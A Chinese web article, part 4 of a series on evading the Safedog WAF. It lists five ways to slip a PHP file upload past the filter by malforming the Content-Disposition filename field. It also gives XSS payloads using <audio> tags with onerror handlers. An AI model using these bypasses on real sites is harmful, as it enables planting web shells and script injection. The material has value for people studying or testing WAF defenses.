主页 > 网络知识 > 绕过WAF的常见Web漏洞利用分析(4)

绕过WAF的常见Web漏洞利用分析(4)

 

1605062477_5fab4f4d89941af72ff83.png!small?1605062477534

 

我们要做的就是构造各种畸形数据包,以混淆WAF的检测规则。

获取文件名的地方在Content-Disposition和Content-Type,所以绕过的地方也主要在这两个地方

 

1605062481_5fab4f51e80b7da4efcd9.png!small?1605062481960

 

直接上传PHP文件会被拦截

 

1605062486_5fab4f560b9bd7261ce56.png!small?1605062486092

1605062488_5fab4f58a2256a0b0ea7e.png!small?1605062488707

 

绕过方法1

将filename=”hhh.php” 改为filename=hhh.php; 即可绕过

 

1605062493_5fab4f5d88d7cc749fa3b.png!small?1605062493621

 

 

1605062499_5fab4f63686ec8e9d5878.png!small?1605062499432

 

绕过方法2

各种换行,主要是要把点号和字符串”php”分开

 

1605062504_5fab4f6801098e061f3e6.png!small?1605062503973

 

绕过方法3

将filename=”hhh.php” 改为 filename==”hhh.php”(三个等号也可以绕过)

 

1605062525_5fab4f7d9fda7ad21f504.png!small?1605062525633

 

绕过方法4

文件名之间放置分号 filename=”hh;h.php”

 

1605062531_5fab4f8387a7322c99d73.png!small?1605062531660

 

绕过方法5

多个filename=”hhh.txt”,最后一个filename=”hhh.php”

 

1605062535_5fab4f87037dca4618398.png!small?1605062535007

 

XSS

查看安全狗的漏洞防护规则可以发现,安全狗对XSS的防护是基于黑名单的,我们只要fuzz一下哪些标签没有被过滤就好了。

 

1605062538_5fab4f8ac369ca8c564ee.png!small?1605062538885

 

有很多标签可以绕过,这里举例两种:

(1) <audio> 标签定义声音,比如音乐或其他音频流。

<audio src=http://www.52bug.cn/hkjs/1 onerror=alert(/xss/);>

<audio src=http://www.52bug.cn/hkjs/1 onerror=prompt('xss');>

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!